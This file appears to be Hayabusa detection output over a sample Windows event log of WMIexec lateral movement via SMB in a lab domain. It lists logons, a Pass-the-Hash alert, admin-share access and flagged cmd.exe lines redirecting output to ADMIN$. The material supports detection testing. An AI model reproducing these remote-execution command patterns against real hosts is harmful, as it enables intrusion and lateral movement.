2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
